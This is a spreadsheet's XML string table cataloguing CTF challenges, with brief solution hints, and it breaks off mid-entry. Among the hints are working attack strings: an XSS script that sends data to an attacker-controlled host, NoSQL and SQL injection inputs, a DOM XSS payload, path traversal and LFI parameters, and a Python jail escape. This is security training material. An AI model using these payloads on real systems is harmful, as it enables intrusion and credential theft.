  <si>
    <t>crack</t>
  </si>
  <si>
    <t>break into company portal</t>
  </si>
  <si>
    <t>xss buffer overflow</t>
  </si>
  <si>
    <t>hidden</t>
  </si>
  <si>
    <t>kpop</t>
  </si>
  <si>
    <t>logic</t>
  </si>
  <si>
    <t>sarge</t>
  </si>
  <si>
    <t>access /home/flag/flag</t>
  </si>
  <si>
    <t xml:space="preserve">remote execute code </t>
  </si>
  <si>
    <t>Use ‘/e’ with preg_replace() to enable remote code execution</t>
  </si>
  <si>
    <t>invalid typechecking, buffer overflow</t>
  </si>
  <si>
    <t>mtpox</t>
  </si>
  <si>
    <t>reseau</t>
  </si>
  <si>
    <t>break into database</t>
  </si>
  <si>
    <t>hash length extension</t>
  </si>
  <si>
    <t>hashpump</t>
  </si>
  <si>
    <t>polygonshifter</t>
  </si>
  <si>
    <t>stem-ctf-2015</t>
  </si>
  <si>
    <t>login as admin</t>
  </si>
  <si>
    <t>angry doraemon</t>
  </si>
  <si>
    <t>buffer overflow</t>
  </si>
  <si>
    <t>leak libc address, call system()</t>
  </si>
  <si>
    <t>th3jackers-ctf-2015</t>
  </si>
  <si>
    <t>reeekeeeeee</t>
  </si>
  <si>
    <t>access file:///proc/self/cwd/mymeme/settings.py#http://</t>
  </si>
  <si>
    <t>django python pickle deserialization flaw to execute code</t>
  </si>
  <si>
    <t>thailand-ctf-2015</t>
  </si>
  <si>
    <t>rendezvous</t>
  </si>
  <si>
    <t>Questions missing</t>
  </si>
  <si>
    <t>access tor secrets of Alice</t>
  </si>
  <si>
    <t>start tor with patched function</t>
  </si>
  <si>
    <t>vidalia, https://www.torproject.org/docs/hidden-services.html.en</t>
  </si>
  <si>
    <t>trend-micro-ctf-2015</t>
  </si>
  <si>
    <t>analysis</t>
  </si>
  <si>
    <t>turn-ctf-teaser</t>
  </si>
  <si>
    <t>whatscat</t>
  </si>
  <si>
    <t>sql database</t>
  </si>
  <si>
    <t>show security flaw of website</t>
  </si>
  <si>
    <t>defkthon</t>
  </si>
  <si>
    <t>web-200</t>
  </si>
  <si>
    <t>SQL</t>
  </si>
  <si>
    <t>Gain Auth on website</t>
  </si>
  <si>
    <t>NoSQL Injection to log in and get flag. 'http://54.201.96.212:888/web200/?userid[$ne]=a&amp;password[$ne]=a'</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Testing_for_NoSQL_injection\</t>
  </si>
  <si>
    <t>uiuctf-2015</t>
  </si>
  <si>
    <t>web-300</t>
  </si>
  <si>
    <t>Java</t>
  </si>
  <si>
    <t xml:space="preserve">Given APK find flag </t>
  </si>
  <si>
    <t>volgactf-quals-2015</t>
  </si>
  <si>
    <t xml:space="preserve">Write shell script to bruteforce password </t>
  </si>
  <si>
    <t>http://jd.benow.ca/ , https://github.com/pxb1988/dex2jar</t>
  </si>
  <si>
    <t>whitehat-contest-10-2015</t>
  </si>
  <si>
    <t>Whitehat-grand-prix-qualifications-2015</t>
  </si>
  <si>
    <t>web-400</t>
  </si>
  <si>
    <t>Couch DB</t>
  </si>
  <si>
    <t xml:space="preserve">Given .php page find flag </t>
  </si>
  <si>
    <t>Use CouchDB's all_entries endpoint to dump the flag as a JSON file.</t>
  </si>
  <si>
    <t>Hitcon</t>
  </si>
  <si>
    <t>diagcgi</t>
  </si>
  <si>
    <t>read_session function</t>
  </si>
  <si>
    <t>open key file in controlled webserver</t>
  </si>
  <si>
    <t>easyinj</t>
  </si>
  <si>
    <t>filtered words</t>
  </si>
  <si>
    <t>sql injection that gets around the filtering</t>
  </si>
  <si>
    <t>leenode</t>
  </si>
  <si>
    <t>password hash</t>
  </si>
  <si>
    <t>use johntheripper to crack password</t>
  </si>
  <si>
    <t>ectf</t>
  </si>
  <si>
    <t>the annoying admin</t>
  </si>
  <si>
    <t>Javascript</t>
  </si>
  <si>
    <t>Get the admin to read your message</t>
  </si>
  <si>
    <t>Submit a Cross-site request forgery</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)</t>
  </si>
  <si>
    <t>NCN CTF Quals</t>
  </si>
  <si>
    <t>MakeMeFeeWet</t>
  </si>
  <si>
    <t>Access == Flag</t>
  </si>
  <si>
    <t>You can download a swap file containing the auth code, use the obtained credentials and inject a valid cookie to get flag</t>
  </si>
  <si>
    <t>linux command: 'curl'</t>
  </si>
  <si>
    <t>WEBster</t>
  </si>
  <si>
    <t>no code</t>
  </si>
  <si>
    <t>Once you login you need to craft a cookie with the proper 'location' (web)</t>
  </si>
  <si>
    <t>hitcon</t>
  </si>
  <si>
    <t>pushin-cat</t>
  </si>
  <si>
    <t>admin role</t>
  </si>
  <si>
    <t>ructf</t>
  </si>
  <si>
    <t>admin100</t>
  </si>
  <si>
    <t>iip, i2p, invisible internet project</t>
  </si>
  <si>
    <t>convert base64 to base32</t>
  </si>
  <si>
    <t>admin200</t>
  </si>
  <si>
    <t>different protocols</t>
  </si>
  <si>
    <t>boston-key-party-2014</t>
  </si>
  <si>
    <t>configure cisco router to configure both protocols simultaneously</t>
  </si>
  <si>
    <t>0ctf</t>
  </si>
  <si>
    <t>fruits</t>
  </si>
  <si>
    <t>Forward</t>
  </si>
  <si>
    <t>i64</t>
  </si>
  <si>
    <t>retrieve flag from server</t>
  </si>
  <si>
    <t>retrieve key from server</t>
  </si>
  <si>
    <t>function pointer</t>
  </si>
  <si>
    <t>Golden Mac 1</t>
  </si>
  <si>
    <t>find secrets on server</t>
  </si>
  <si>
    <t>python script</t>
  </si>
  <si>
    <t>Golden Mac 2</t>
  </si>
  <si>
    <t>find flag on the server</t>
  </si>
  <si>
    <t>lily</t>
  </si>
  <si>
    <t>modify the email</t>
  </si>
  <si>
    <t>mislead</t>
  </si>
  <si>
    <t>login to server</t>
  </si>
  <si>
    <t>risc_emu</t>
  </si>
  <si>
    <t>olympic ctf</t>
  </si>
  <si>
    <t>RPC</t>
  </si>
  <si>
    <t>Json-rpc</t>
  </si>
  <si>
    <t>exploit web server</t>
  </si>
  <si>
    <t xml:space="preserve">exploit arbirary file write primitive to execute remote shell using JSON-RPC injection </t>
  </si>
  <si>
    <t>32C3-CTF</t>
  </si>
  <si>
    <t>gurke</t>
  </si>
  <si>
    <t>pickle</t>
  </si>
  <si>
    <t xml:space="preserve">Can you figure out the gurke </t>
  </si>
  <si>
    <t xml:space="preserve">Have pickle deserialize your arbitrary code and dump the flag </t>
  </si>
  <si>
    <t>https://www.cs.uic.edu/~s/musings/pickle.html , Py library 'marshal'</t>
  </si>
  <si>
    <t>plaidctf</t>
  </si>
  <si>
    <t>QTTPD</t>
  </si>
  <si>
    <t>find correct path</t>
  </si>
  <si>
    <t>get values in POST_PATH</t>
  </si>
  <si>
    <t>radhos</t>
  </si>
  <si>
    <t>web scale key</t>
  </si>
  <si>
    <t>web100</t>
  </si>
  <si>
    <t>automatic language detection</t>
  </si>
  <si>
    <t>change Accept-Language header</t>
  </si>
  <si>
    <t>web200</t>
  </si>
  <si>
    <t>cookies and hmac</t>
  </si>
  <si>
    <t>get admin cookie, then get hmac</t>
  </si>
  <si>
    <t>http://www.freeformatter.com/hmac-generator.html</t>
  </si>
  <si>
    <t>cipher</t>
  </si>
  <si>
    <t>code70</t>
  </si>
  <si>
    <t>custom cipher</t>
  </si>
  <si>
    <t>reverse the encrytion logic, write a python script</t>
  </si>
  <si>
    <t>python: join, ord, chr, bin</t>
  </si>
  <si>
    <t>code80</t>
  </si>
  <si>
    <t>sha1</t>
  </si>
  <si>
    <t>web300</t>
  </si>
  <si>
    <t>brute force all chars to get the hash</t>
  </si>
  <si>
    <t>GIF</t>
  </si>
  <si>
    <t>python: hashlib.sha1(brute).digest().encode("hex")</t>
  </si>
  <si>
    <t>send picture as 1x1 giff and get cookie of response</t>
  </si>
  <si>
    <t>backdoorctf</t>
  </si>
  <si>
    <t>crypto50</t>
  </si>
  <si>
    <t>tapir</t>
  </si>
  <si>
    <t>jshunt</t>
  </si>
  <si>
    <t>solor planet-number</t>
  </si>
  <si>
    <t>make you js code run on the server</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Planet</t>
  </si>
  <si>
    <t>use python to create GIF</t>
  </si>
  <si>
    <t>judge</t>
  </si>
  <si>
    <t>find flag in directory</t>
  </si>
  <si>
    <t>bypass WAF</t>
  </si>
  <si>
    <t>lhc</t>
  </si>
  <si>
    <t>flag is in the middle of the data set</t>
  </si>
  <si>
    <t>specify a range with curl</t>
  </si>
  <si>
    <t>‘curl -r 1099999999952-1100000000049 https://lhc-cdn.herokuapp.com/data.txt’</t>
  </si>
  <si>
    <t>bctf</t>
  </si>
  <si>
    <t>sqli_engine</t>
  </si>
  <si>
    <t>steal admins unhashed password</t>
  </si>
  <si>
    <t>caesar</t>
  </si>
  <si>
    <t>tapir cipher</t>
  </si>
  <si>
    <t>https://rgpsecurity.wordpress.com/2014/10/17/stasi-vernam-cipher-gernator-tapir/</t>
  </si>
  <si>
    <t>torrent_lover</t>
  </si>
  <si>
    <t>access directory</t>
  </si>
  <si>
    <t>create symbolic link and run binary</t>
  </si>
  <si>
    <t>webchat</t>
  </si>
  <si>
    <t>login without being detected</t>
  </si>
  <si>
    <t>&lt;script&gt;window.location="http://&lt;myip&gt;:9999?cookie="+document.URL&lt;/script&gt;</t>
  </si>
  <si>
    <t>base32, caesar cipher</t>
  </si>
  <si>
    <t>Boston-key-party</t>
  </si>
  <si>
    <t>http://www.geocachingtoolbox.com/index.php?page=asciiConversion</t>
  </si>
  <si>
    <t>Andrew</t>
  </si>
  <si>
    <t>nginx</t>
  </si>
  <si>
    <t>crack experimental CDN based on nginx</t>
  </si>
  <si>
    <t>file:// protocol</t>
  </si>
  <si>
    <t>libcurl</t>
  </si>
  <si>
    <t>Northeastern Univ</t>
  </si>
  <si>
    <t>exploit strcmp</t>
  </si>
  <si>
    <t>‘if (strcmp($_GET['password'], $flag) == 0)’</t>
  </si>
  <si>
    <t>crypto60</t>
  </si>
  <si>
    <t>Prudential</t>
  </si>
  <si>
    <t>rsa</t>
  </si>
  <si>
    <t>very easy</t>
  </si>
  <si>
    <t>openssl to get public keys and yafu to factorize</t>
  </si>
  <si>
    <t>booty</t>
  </si>
  <si>
    <t>yafu, openssl, rsa_modules</t>
  </si>
  <si>
    <t>break the sha1</t>
  </si>
  <si>
    <t>extract flag from text based arm wrestling game</t>
  </si>
  <si>
    <t>format string vunerablity</t>
  </si>
  <si>
    <t>sha1(NULL) === sha1(NULL)</t>
  </si>
  <si>
    <t>socat</t>
  </si>
  <si>
    <t>crypto70</t>
  </si>
  <si>
    <t>custom hash</t>
  </si>
  <si>
    <t>Kummerkasten</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>Make the web admin happy</t>
  </si>
  <si>
    <t>Use of BeEF tool and XSS attacks (web)</t>
  </si>
  <si>
    <t>brute force hash with iteration</t>
  </si>
  <si>
    <t>python: itertools</t>
  </si>
  <si>
    <t>classy</t>
  </si>
  <si>
    <t>java</t>
  </si>
  <si>
    <t>exploit custom java interpeter</t>
  </si>
  <si>
    <t>crypto90</t>
  </si>
  <si>
    <t>overwrite return address of gllib c libraries , return to syscall</t>
  </si>
  <si>
    <t>encryption is xor and has knownplaintext</t>
  </si>
  <si>
    <t>rev90</t>
  </si>
  <si>
    <t>ruby cube</t>
  </si>
  <si>
    <t>9 chars on one side of cube are not random</t>
  </si>
  <si>
    <t>Bonus 200</t>
  </si>
  <si>
    <t>RCE bug</t>
  </si>
  <si>
    <t>TinyHosting</t>
  </si>
  <si>
    <t>place shell on server and execute ./flag</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>pwn the webservice</t>
  </si>
  <si>
    <t>PHP internally handles backticks? It runs sh -c cmd</t>
  </si>
  <si>
    <t xml:space="preserve">CodeGate </t>
  </si>
  <si>
    <t>owltube</t>
  </si>
  <si>
    <t>caesar20</t>
  </si>
  <si>
    <t>pwn this webservice</t>
  </si>
  <si>
    <t>caeser</t>
  </si>
  <si>
    <t>database uses AES-CBC to encode cookies and is vunerable to padding attacks. Forge a cookie this way '{"u":"admin"}\x03\x03\x03' (web)</t>
  </si>
  <si>
    <t>write a python script</t>
  </si>
  <si>
    <t>Owlur</t>
  </si>
  <si>
    <t>Exploit 100</t>
  </si>
  <si>
    <t>retrieve flag from webserver</t>
  </si>
  <si>
    <t>admin panel</t>
  </si>
  <si>
    <t xml:space="preserve">use php wrapper to bypass filter and upload your file and execute the desired code. </t>
  </si>
  <si>
    <t>run tool</t>
  </si>
  <si>
    <t>steganography tool</t>
  </si>
  <si>
    <t>valley20</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/File_inclusion_vulnerability , http://php.net/manual/en/wrappers.php</t>
  </si>
  <si>
    <t>book code</t>
  </si>
  <si>
    <t>get word from book</t>
  </si>
  <si>
    <t>substitution50</t>
  </si>
  <si>
    <t>substituitoin</t>
  </si>
  <si>
    <t>find the subsitution code table</t>
  </si>
  <si>
    <t>http://quipqiup.com/index.php</t>
  </si>
  <si>
    <t>Exploit 300</t>
  </si>
  <si>
    <t>Gitlist</t>
  </si>
  <si>
    <t>view contents using payload</t>
  </si>
  <si>
    <t>xor50</t>
  </si>
  <si>
    <t>xor</t>
  </si>
  <si>
    <t>brute force one byte xor key</t>
  </si>
  <si>
    <t>Exploit 400</t>
  </si>
  <si>
    <t>ghost process</t>
  </si>
  <si>
    <t>rpxo70</t>
  </si>
  <si>
    <t>assembly unicode string</t>
  </si>
  <si>
    <t>recon-2</t>
  </si>
  <si>
    <t>find repeating pattern and crack</t>
  </si>
  <si>
    <t>search usernames</t>
  </si>
  <si>
    <t>commit to bitbucket and receive flag</t>
  </si>
  <si>
    <t>repeating.xor.cipher.cracker.py</t>
  </si>
  <si>
    <t>http://checkusernames.com/</t>
  </si>
  <si>
    <t>Misc 400</t>
  </si>
  <si>
    <t>FTP Server 0.99g</t>
  </si>
  <si>
    <t>buffer overflow in MKD command</t>
  </si>
  <si>
    <t>rsa80</t>
  </si>
  <si>
    <t>remote web</t>
  </si>
  <si>
    <t>breakout</t>
  </si>
  <si>
    <t>ecc100</t>
  </si>
  <si>
    <t>find port number</t>
  </si>
  <si>
    <t>gain access</t>
  </si>
  <si>
    <t>nmap vie /lib64/ld-linux-x86-64.so.2</t>
  </si>
  <si>
    <t>ecc</t>
  </si>
  <si>
    <t>trigger exception which triggers shell from system(/bin/bash)</t>
  </si>
  <si>
    <t>python: pyecc or sage</t>
  </si>
  <si>
    <t>Hack-t-privat-site-1</t>
  </si>
  <si>
    <t>break into website and steal private data</t>
  </si>
  <si>
    <t>entropy110</t>
  </si>
  <si>
    <t>web2</t>
  </si>
  <si>
    <t>generate valid cookie</t>
  </si>
  <si>
    <t>block130</t>
  </si>
  <si>
    <t>ice ctf</t>
  </si>
  <si>
    <t>authorize</t>
  </si>
  <si>
    <t>meet in the middle</t>
  </si>
  <si>
    <t>pypy: fast python for bruteforce</t>
  </si>
  <si>
    <t>gain access to webapp</t>
  </si>
  <si>
    <t>basic sql injection using sqlmap</t>
  </si>
  <si>
    <t>http://sqlmap.org/</t>
  </si>
  <si>
    <t>web140</t>
  </si>
  <si>
    <t>callgate</t>
  </si>
  <si>
    <t>ecb</t>
  </si>
  <si>
    <t>ecb byte by byte</t>
  </si>
  <si>
    <t>hardening measurement</t>
  </si>
  <si>
    <t>ROP attack to read string “flag\x00” open file and read address</t>
  </si>
  <si>
    <t>cookie75</t>
  </si>
  <si>
    <t>barista</t>
  </si>
  <si>
    <t>md5</t>
  </si>
  <si>
    <t>online md5 cracker</t>
  </si>
  <si>
    <t>https://hashkiller.co.uk/md5-decrypter.aspx</t>
  </si>
  <si>
    <t>fuzzy</t>
  </si>
  <si>
    <t>reverse engineer app and exploit</t>
  </si>
  <si>
    <t>gain admin access</t>
  </si>
  <si>
    <t>ti-1337</t>
  </si>
  <si>
    <t>find the key in the file</t>
  </si>
  <si>
    <t>tictoc90</t>
  </si>
  <si>
    <t>overwrite the get function for is_admin 'http://coffee.icec.tf/__defineGetter__?args=is_admin'</t>
  </si>
  <si>
    <t>Similar to hack_lu's 'Objection' problem</t>
  </si>
  <si>
    <t>chinese remainder theorem, Euler's theorem</t>
  </si>
  <si>
    <t>totient number</t>
  </si>
  <si>
    <t>bomb</t>
  </si>
  <si>
    <t xml:space="preserve">php </t>
  </si>
  <si>
    <t>defuse the bomb</t>
  </si>
  <si>
    <t>rsa200</t>
  </si>
  <si>
    <t>change the index.php action to 'defuse' to get the flag</t>
  </si>
  <si>
    <t>ranklin-Reiter Related Message Attack</t>
  </si>
  <si>
    <t>nicklesanddimes</t>
  </si>
  <si>
    <t>need admin account</t>
  </si>
  <si>
    <t>reset team account to get admin email and md5 password</t>
  </si>
  <si>
    <t>premonition</t>
  </si>
  <si>
    <t>passwords table</t>
  </si>
  <si>
    <t>Oreo</t>
  </si>
  <si>
    <t>sanutf8y_check</t>
  </si>
  <si>
    <t>structure layout</t>
  </si>
  <si>
    <t>use fake structures and dl_resolve to call system</t>
  </si>
  <si>
    <t>crypto100</t>
  </si>
  <si>
    <t>AES</t>
  </si>
  <si>
    <t>predictable salt due to randomExtend (Bruteforce)</t>
  </si>
  <si>
    <t>pycrypto</t>
  </si>
  <si>
    <t>encode characters that resemble ascii characters</t>
  </si>
  <si>
    <t>yws</t>
  </si>
  <si>
    <t>filtered text</t>
  </si>
  <si>
    <t>webserver doesnt filter '..'</t>
  </si>
  <si>
    <t>giffy</t>
  </si>
  <si>
    <t>none</t>
  </si>
  <si>
    <t>The flag is one level below 'http://web2015.icec.tf/giffy/gif.php?gif=../flag.txt' (must use curl)</t>
  </si>
  <si>
    <t>hackers in disguise</t>
  </si>
  <si>
    <t>Help the hackers find a disguise</t>
  </si>
  <si>
    <t xml:space="preserve">Perl's open() function is vunerable to command injection </t>
  </si>
  <si>
    <t>a-familiar-system</t>
  </si>
  <si>
    <t>ElGamal</t>
  </si>
  <si>
    <t>prev_prime();derive private key from public key</t>
  </si>
  <si>
    <t>injection</t>
  </si>
  <si>
    <t>Possible to set variables through GET 'http://web2015.icec.tf/injection/login.php?dbg=true'</t>
  </si>
  <si>
    <t>caplow</t>
  </si>
  <si>
    <t>Capitalize letters</t>
  </si>
  <si>
    <t>mask</t>
  </si>
  <si>
    <t>turn binary number into decimal number, find differences of a similar sequnce, turn different number to hex</t>
  </si>
  <si>
    <t>rsa-in-real-world</t>
  </si>
  <si>
    <t>RSA</t>
  </si>
  <si>
    <t>bit patterns</t>
  </si>
  <si>
    <t>ultra-secure</t>
  </si>
  <si>
    <t>Paillier</t>
  </si>
  <si>
    <t>Paillier System/Homomorphic properties</t>
  </si>
  <si>
    <t>fact-or-real</t>
  </si>
  <si>
    <t>Liar</t>
  </si>
  <si>
    <t>php / javascript</t>
  </si>
  <si>
    <t>social media?</t>
  </si>
  <si>
    <t>echo -n "NO+\$=YES" | md5sum</t>
  </si>
  <si>
    <t>Can you find the flag?</t>
  </si>
  <si>
    <t>personnel-database</t>
  </si>
  <si>
    <t>user info saved to drive</t>
  </si>
  <si>
    <t>make script to register user, set description, log out then back in</t>
  </si>
  <si>
    <t>twitter</t>
  </si>
  <si>
    <t>RECON</t>
  </si>
  <si>
    <t>how-much-exactly</t>
  </si>
  <si>
    <t>question</t>
  </si>
  <si>
    <t>google, find document related. Find related test to find answer</t>
  </si>
  <si>
    <t>TRIVIA</t>
  </si>
  <si>
    <t>Call the function printflag() in the developer console to print the flag</t>
  </si>
  <si>
    <t>hwaes</t>
  </si>
  <si>
    <t>No vuln, understanding of AES Rijndael Key Expansion, create script to reverse the expansion.</t>
  </si>
  <si>
    <t>http://tinyurl.com/hwaesbook</t>
  </si>
  <si>
    <t>sso</t>
  </si>
  <si>
    <t>custom crypto</t>
  </si>
  <si>
    <t>Simple crypto scheme to store user credentials. Modify token and gain access.</t>
  </si>
  <si>
    <t>The union</t>
  </si>
  <si>
    <t>http://www.crimsonagents.com/2015/01/31c3ctf-crypto-sso.html</t>
  </si>
  <si>
    <t>DT_STRTAB pointing to other functions</t>
  </si>
  <si>
    <t>perform two 2-byte writes to overwrite puts@GOT</t>
  </si>
  <si>
    <t>WEB PROBLEM</t>
  </si>
  <si>
    <t>oh no!</t>
  </si>
  <si>
    <t>flag is contained in the source</t>
  </si>
  <si>
    <t>SQL Injection 1</t>
  </si>
  <si>
    <t>Exploit-100</t>
  </si>
  <si>
    <t>What is SQL Injection?</t>
  </si>
  <si>
    <t>basic sql injection ''OR 1=1 --'</t>
  </si>
  <si>
    <t>disassemble and telnet</t>
  </si>
  <si>
    <t>Wiki and the Furious</t>
  </si>
  <si>
    <t>Can you replay your hack without XSS?</t>
  </si>
  <si>
    <t>web element is vunerable to DOM XSS 'http://furious-wiki.icec.tf/post/miBFx2VpRdsXClehVdqyBKCuaZZOIFsO/title#%3Cimg%20src%3Dn%20onerror%3Dalert(%22weee%22)%3E '</t>
  </si>
  <si>
    <t>differential_power</t>
  </si>
  <si>
    <t>TEA Cipher</t>
  </si>
  <si>
    <t>Z3</t>
  </si>
  <si>
    <t>Exploit-300</t>
  </si>
  <si>
    <t>escape jail</t>
  </si>
  <si>
    <t>wiki</t>
  </si>
  <si>
    <t>Not exactly Alcatraz</t>
  </si>
  <si>
    <t>What is XSS?</t>
  </si>
  <si>
    <t>break out of shell and read files</t>
  </si>
  <si>
    <t>Believe the app is vuln to XSS - Part 2 is Wiki and the Furious</t>
  </si>
  <si>
    <t>school ctf</t>
  </si>
  <si>
    <t>__builtins__.__dict__['ZXZhbA=='.decode('base64')]</t>
  </si>
  <si>
    <t>misconfiguration</t>
  </si>
  <si>
    <t>MITM_II_</t>
  </si>
  <si>
    <t>Access the page</t>
  </si>
  <si>
    <t xml:space="preserve">Using the provided proxy request 'localhost:11911/' to retrieve the flag </t>
  </si>
  <si>
    <t>ECC</t>
  </si>
  <si>
    <t>man in the middle</t>
  </si>
  <si>
    <t>junior pentesting</t>
  </si>
  <si>
    <t>xorxes</t>
  </si>
  <si>
    <t>SHA224</t>
  </si>
  <si>
    <t>echo -n 'FLAG' | md5sum</t>
  </si>
  <si>
    <t>Valet!</t>
  </si>
  <si>
    <t>connect to server and play game</t>
  </si>
  <si>
    <t>Use a basic sql injection  ' or 1=1;--</t>
  </si>
  <si>
    <t>shop of goodness</t>
  </si>
  <si>
    <t>php?</t>
  </si>
  <si>
    <t>How can you register?</t>
  </si>
  <si>
    <t>Bypass the 4th step by changing the parameter in the URL</t>
  </si>
  <si>
    <t>europe01</t>
  </si>
  <si>
    <t>hard (Up for discussion)</t>
  </si>
  <si>
    <t>x86 elf</t>
  </si>
  <si>
    <t>Find flags hidden in binary using vulns</t>
  </si>
  <si>
    <t>stored-pass</t>
  </si>
  <si>
    <t>Trigger race condition by logging in as two users</t>
  </si>
  <si>
    <t>php / html</t>
  </si>
  <si>
    <t>feal</t>
  </si>
  <si>
    <t>The password doesn't work</t>
  </si>
  <si>
    <t>feal-4</t>
  </si>
  <si>
    <t>Using the object inspector find the password string and change the type to text to retrieve the flag</t>
  </si>
  <si>
    <t>decrypt</t>
  </si>
  <si>
    <t>find all 6 subkeys</t>
  </si>
  <si>
    <t>unusual redirection</t>
  </si>
  <si>
    <t>Access the flag</t>
  </si>
  <si>
    <t>Flag is in HTTP body when you access /flag. Proxy your browser using burpsuite to retrieve the flag</t>
  </si>
  <si>
    <t>school ctf winter</t>
  </si>
  <si>
    <t>Hunger games</t>
  </si>
  <si>
    <t>europe02</t>
  </si>
  <si>
    <t>execute stack overflow by entering long username</t>
  </si>
  <si>
    <t>coor-coor</t>
  </si>
  <si>
    <t xml:space="preserve">OTR pidgin </t>
  </si>
  <si>
    <t xml:space="preserve">find OTR encryption key </t>
  </si>
  <si>
    <t>dogecrypt</t>
  </si>
  <si>
    <t>unix crypt</t>
  </si>
  <si>
    <t>brute force with dictionary</t>
  </si>
  <si>
    <t>phpcrypto</t>
  </si>
  <si>
    <t>europe03</t>
  </si>
  <si>
    <t xml:space="preserve">We need bananas! </t>
  </si>
  <si>
    <t>shell script and curl</t>
  </si>
  <si>
    <t>use the developer console and send the value '$("input").val("banana")' (web)</t>
  </si>
  <si>
    <t>pillowtalk</t>
  </si>
  <si>
    <t>known plaintext</t>
  </si>
  <si>
    <t>add ‘\n’ to each message to record position/value of pairs</t>
  </si>
  <si>
    <t>camp-ctf</t>
  </si>
  <si>
    <t>trolol-150</t>
  </si>
  <si>
    <t>radioactive</t>
  </si>
  <si>
    <t>AES-ECB</t>
  </si>
  <si>
    <t>need md5 for login</t>
  </si>
  <si>
    <t>exploit tag</t>
  </si>
  <si>
    <t>instal pear package</t>
  </si>
  <si>
    <t>websocket-75</t>
  </si>
  <si>
    <t>request sent back as linked list</t>
  </si>
  <si>
    <t>go through list until find argument</t>
  </si>
  <si>
    <t>fuckpyjails</t>
  </si>
  <si>
    <t>easyCTF</t>
  </si>
  <si>
    <t>Get flag from python client / server</t>
  </si>
  <si>
    <t>plot twist</t>
  </si>
  <si>
    <t>execute python shell -&gt; allocate other string using python libc to access raw memory of python process</t>
  </si>
  <si>
    <t>flag is on the site</t>
  </si>
  <si>
    <t>Network 200</t>
  </si>
  <si>
    <t>teach me how to write like this</t>
  </si>
  <si>
    <t>get past pay wall</t>
  </si>
  <si>
    <t>delete class='pay' and class='blur'</t>
  </si>
  <si>
    <t>reverse myxor function</t>
  </si>
  <si>
    <t>johnlions</t>
  </si>
  <si>
    <t>Gain root on unix server</t>
  </si>
  <si>
    <t xml:space="preserve">gain root in a unix system using any method </t>
  </si>
  <si>
    <t>rot13</t>
  </si>
  <si>
    <t>Peace Pipe</t>
  </si>
  <si>
    <t>custom</t>
  </si>
  <si>
    <t>send correct key</t>
  </si>
  <si>
    <t>read js code</t>
  </si>
  <si>
    <t>Wiener</t>
  </si>
  <si>
    <t>fix obfuscated code</t>
  </si>
  <si>
    <t>use python script to get private key</t>
  </si>
  <si>
    <t>wastebin</t>
  </si>
  <si>
    <t>flag in database</t>
  </si>
  <si>
    <t>database is stored client side</t>
  </si>
  <si>
    <t>Crypto-100</t>
  </si>
  <si>
    <t>factor the provided number</t>
  </si>
  <si>
    <t>pwn100</t>
  </si>
  <si>
    <t>easter</t>
  </si>
  <si>
    <t>Crypto-200</t>
  </si>
  <si>
    <t>look around page</t>
  </si>
  <si>
    <t>Given binary get flag</t>
  </si>
  <si>
    <t>deobfuscate JavaScript code with console</t>
  </si>
  <si>
    <t>Stack overflow to jump to address where flag is written</t>
  </si>
  <si>
    <t>Rot-3 caesor shift</t>
  </si>
  <si>
    <t>Crypto-300</t>
  </si>
  <si>
    <t>personal home page</t>
  </si>
  <si>
    <t>c script</t>
  </si>
  <si>
    <t>Crypto-400</t>
  </si>
  <si>
    <t>file permission</t>
  </si>
  <si>
    <t>local file inclusion ‘?page=supersecretflag.txt’</t>
  </si>
  <si>
    <t>brute force</t>
  </si>
  <si>
    <t>ECB, it’s easy as 123</t>
  </si>
  <si>
    <t>ECB</t>
  </si>
  <si>
    <t>super secure lemons</t>
  </si>
  <si>
    <t>remove first 16 bytes and replace with valid BMP header</t>
  </si>
  <si>
    <t>are the lemons secure</t>
  </si>
  <si>
    <t>view certificate</t>
  </si>
  <si>
    <t>Safer than rot13</t>
  </si>
  <si>
    <t>substitution cipher</t>
  </si>
  <si>
    <t>use a crypto solver</t>
  </si>
  <si>
    <t>quipquip.com</t>
  </si>
  <si>
    <t>pretty horrible programming</t>
  </si>
  <si>
    <t>how are passwords checked?</t>
  </si>
  <si>
    <t>supplying an array, instead of a single parameter, results in comparision being true ‘http://web.easyctf.com:10201/index.php?password[]=x’</t>
  </si>
  <si>
    <t>Wastebin 3</t>
  </si>
  <si>
    <t>sql injection ‘admin' or 'x'='x --’</t>
  </si>
  <si>
    <t>WTC RSA BBQ</t>
  </si>
  <si>
    <t>python script (special n ending a sequence of xff)</t>
  </si>
  <si>
    <t>openssl</t>
  </si>
  <si>
    <t>infinity star</t>
  </si>
  <si>
    <t>get into admin account</t>
  </si>
  <si>
    <t>break_me</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery</t>
  </si>
  <si>
    <t>base 64</t>
  </si>
  <si>
    <t>Given String -&gt; Base 64 -&gt; Run File CMD -&gt; Use Bzip2</t>
  </si>
  <si>
    <t>mic check</t>
  </si>
  <si>
    <t>borkened</t>
  </si>
  <si>
    <t xml:space="preserve">run string through ceaser cipher solver then decode with base 64 </t>
  </si>
  <si>
    <t>quipquip</t>
  </si>
  <si>
    <t>search for teams ‘\/team\?.*?’</t>
  </si>
  <si>
    <t>pillow</t>
  </si>
  <si>
    <t>polictf</t>
  </si>
  <si>
    <t>magic</t>
  </si>
  <si>
    <t>user and surname</t>
  </si>
  <si>
    <t>make user = &lt;?php (new Magic())-&gt;test();?&gt; and surname = foo.php, then visit log</t>
  </si>
  <si>
    <t>generate large integer due to integer representation of key as integer</t>
  </si>
  <si>
    <t>unpyc3</t>
  </si>
  <si>
    <t>this is not bad</t>
  </si>
  <si>
    <t xml:space="preserve">crc32 </t>
  </si>
  <si>
    <t>Bypass CRC32 salt and launch shellcode</t>
  </si>
  <si>
    <t>referee</t>
  </si>
  <si>
    <t>john-the-travler</t>
  </si>
  <si>
    <t>css</t>
  </si>
  <si>
    <t>size</t>
  </si>
  <si>
    <t>use chrome dev tools to change to mobile view, turns into qr code</t>
  </si>
  <si>
    <t>su-ctf-quals</t>
  </si>
  <si>
    <t>Decrypt the Message!</t>
  </si>
  <si>
    <t>poem code (http://wmbriggs.com/post/1001/)</t>
  </si>
  <si>
    <t>use this code to solve (https://github.com/abpolym/crypto-tools/tree/master/poemcode)</t>
  </si>
  <si>
    <t>aart</t>
  </si>
  <si>
